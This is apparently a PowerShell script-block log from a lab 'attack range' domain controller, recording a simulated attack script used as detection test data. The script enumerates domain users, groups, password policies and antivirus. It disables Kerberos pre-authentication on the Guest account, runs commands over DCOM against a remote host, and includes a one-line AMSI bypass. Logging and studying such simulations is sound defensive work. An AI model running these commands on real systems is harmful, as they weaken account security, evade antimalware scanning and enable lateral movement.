4104132150x0101353Microsoft-Windows-PowerShell/Operationalwin-dc-tcontreras-attack-range-677.attackrange.local11Get-LocalUser | Out-File -FilePath .\localUser.txt; Get-ADUserResultantPasswordPolicy -Identity Administrator | Out-File -FilePath .\PasswordPolicy.txt; Get-ADuser Guest | Set-ADAccountControl -DoesNotRequirePreAuth:$true; Get-ADDefaultDomainPasswordPolicy | Out-File -FilePath .\ADDefaultPassPolicy.txt;Enter-PSSession -ComputerName ar-win-dc-default-attack-range;[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt;$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append;[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt;get-wmiobject win32_group | Out-File -FilePath .\DomainGroup.txt;$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")); $item = $o.Item() ; $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0);[activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","10.0.1.16")).Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0); Get-AdComputer -Filter * | Out-File -FilePath .\AdComputer.txt;[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);Invoke-Command -ComputerName ar-win-dc-default-attack-range -ScriptBlock {ipconfig};Get-WmiObject -Query “SELECT * FROM AntiSpywareProductâ€;Get-WmiObject -Query “SELECT * FROM AntiVirusProductâ€;get-wmiobject Win32_ComputerSystemProducta4de67dc-2c1f-4ed7-85bd-4fba124ed6e2C:\Temp\simulate.ps1
4104132150x0101093Microsoft-Windows-PowerShell/Operationalwin-dc-tcontreras-attack-range-677.attackrange.local11Get-LocalUser | Out-File -FilePath .\localUser.txt
Get-ADUserResultantPasswordPolicy -Identity Administrator | Out-File -FilePath .\PasswordPolicy.txt
Get-ADuser Guest | Set-ADAccountControl -DoesNotRequirePreAuth:$true
Get-ADDefaultDomainPasswordPolicy | Out-File -FilePath .\ADDefaultPassPolicy.txt
Enter-PSSession -ComputerName ar-win-dc-default-attack-range
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
get-wmiobject win32_group | Out-File -FilePath .\DomainGroup.txt
$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
$item = $o.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
[activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","10.0.1.16")).Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
powershell.exe Get-AdComputer -Filter * | Out-File -FilePath .\AdComputer.txt
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Command -ComputerName ar-win-dc-default-tcontreras-attack-range -ScriptBlock {ipconfig}
Get-WmiObject -Query "SELECT * FROM AntiSpywareProduct"
Get-WmiObject -Query "SELECT * FROM AntiVirusProduct"
get-wmiobject Win32_ComputerSystemProduct5b113130-9a93-41be-b3c4-f38d1d313ea5C:\Temp\simulate.ps1